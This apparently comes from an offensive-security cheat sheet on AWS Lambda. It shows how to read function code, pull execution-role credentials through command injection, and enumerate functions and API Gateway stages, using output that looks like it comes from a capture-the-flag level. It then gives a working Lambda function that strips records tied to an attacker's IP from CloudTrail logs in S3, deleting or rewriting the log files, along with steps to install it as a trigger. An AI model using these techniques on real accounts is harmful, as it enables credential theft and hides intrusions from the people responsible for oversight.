Skip to content

Lambda

Lambda

Lambda functions drop their code into a read-only partition mounted to /var/task. If interactive within a container, inspecting the function code will provide insight to what the function does & has access to:

ls /var/task
cat /var/task/lambda_function.py

We can retrieve the Lambda execution role credentials by pulling the environment. Run "export" via CMD injection or in the context of Lambda running.
Retrieve the aws_access_key_id, aws_secret_access_key, aws_session_token and configure your AWS cli aws configure --profile <PROFILE_NAME>.
You need to manually add the aws_session_token in the new profile under "\~/.aws/credentials".
The aws_session_token doesn't last long, you need to refresh it after a while.

Enumerate lambda functions

aws lambda list-functions --region <AWS_REGION>
aws lambda list-functions --region <AWS_REGION> --profile <PROFILE_NAME>

List Lamba Functions

>>> aws --region us-west-2 --profile level6 lambda list-functions | jq
{
  "Functions": [
    {
      "FunctionName": "Level6",
      "FunctionArn": "arn:aws:lambda:us-west-2:975426262029:function:Level6",
      "Runtime": "python2.7",
      "Role": "arn:aws:iam::975426262029:role/service-role/Level6",
      "Handler": "lambda_function.lambda_handler",
      "CodeSize": 282,
      "Description": "A starter AWS Lambda function.",
      "Timeout": 3,
      "MemorySize": 128,
      "LastModified": "2017-02-27T00:24:36.054+0000",
      "CodeSha256": "2iEjBytFbH91PXEMO5R/B9DqOgZ7OG/lqoBNZh5JyFw=",
      "Version": "$LATEST",
      "TracingConfig": {
        "Mode": "PassThrough"
      },
      "RevisionId": "22f08307-9080-4403-bf4d-481ddc8dcb89"
    }
  ]
}

List Specific Lamba Function

>>> aws --region us-west-2 --profile level6 lambda get-policy --function-name Level6 | jq
{
  "Policy": "{\"Version\":\"2012-10-17\",\"Id\":\"default\",\"Statement\":[{\"Sid\":\"904610a93f593b76ad66ed6ed82c0a8b\",\"Effect\":\"Allow\",\"Principal\":{\"Service\":\"apigateway.amazonaws.com\"},\"Action\":\"lambda:InvokeFunction\",\"Resource\":\"arn:aws:lambda:us-west-2:975426262029:function:Level6\",\"Condition\":{\"ArnLike\":{\"AWS:SourceArn\":\"arn:aws:execute-api:us-west-2:975426262029:s33ppypa75/*/GET/level6\"}}}]}",
  "RevisionId": "22f08307-9080-4403-bf4d-481ddc8dcb89"
}

List Lamda Policies

>>> aws --profile level6 --region us-west-2 apigateway get-stages --rest-api-id "s33ppypa75" | jq
{
  "item": [
    {
      "deploymentId": "8gppiv",
      "stageName": "Prod",
      "cacheClusterEnabled": false,
      "cacheClusterStatus": "NOT_AVAILABLE",
      "methodSettings": {},
      "tracingEnabled": false,
      "createdDate": 1488155168,
      "lastUpdatedDate": 1488155168
    }
  ]
}

https://s33ppypa75.execute-api.us-west-2.amazonaws.com/Prod/level6

Example

Lambda function:

import json
import urllib
import boto3
import gzip
import tempfile
import shutil
 
dirty_tag = <IP_ADDRESS>
 
def filter_dirty_tag(log):
    return dirty_tag in json.dumps(log)
 
s3 = boto3.client('s3')
 
def lambda_handler(event, context):
    bucket = event['Records'][0]['s3']['bucket']['name']
    key = urllib.unquote_plus(event['Records'][0]['s3']['object']['key']).decode('utf8')
    resp = s3.get_object(Bucket=bucket, Key=key)
    gzip_tmp = tempfile.NamedTemporaryFile(delete=False)
    shutil.copyfileobj(resp['Body'], gzip_tmp)
    gzip_tmp.close()
     
    gzip_filename = gzip_tmp.name
    with gzip.open(gzip_filename, 'rb') as f:
        file_content = f.read()
     
    logs = json.loads(file_content)
 
    old_num_logs = len(logs['Records'])
    print old_num_logs
    logs['Records'] = filter(lambda x: not filter_dirty_tag(x), logs['Records'])
    print len(logs['Records'])
 
    if len(logs['Records']) == 0:
        print "Deleting empty %s" % key
        s3.delete_object(Bucket=bucket, Key=key)
    elif len(logs['Records']) == old_num_logs:
        print "Doing nothing no log records filtered"
    else:
        print "Updating %s" % key
        with gzip.open(gzip_filename, 'wb') as f:
            f.write(json.dumps(logs, separators=(',',':')))
        s3.put_object(Bucket=bucket, Key=key, Body=open(gzip_filename, 'rb'))

Add the trigger for this function by clicking "S3" on the left hand-side of the interface in the web console. Select the S3 bucket with the logs and the click the "Add" button.

Further information:

Exploiting Lamda (Containers)

Can use /tmp to store data since it is cached as long as you keep hitting the application.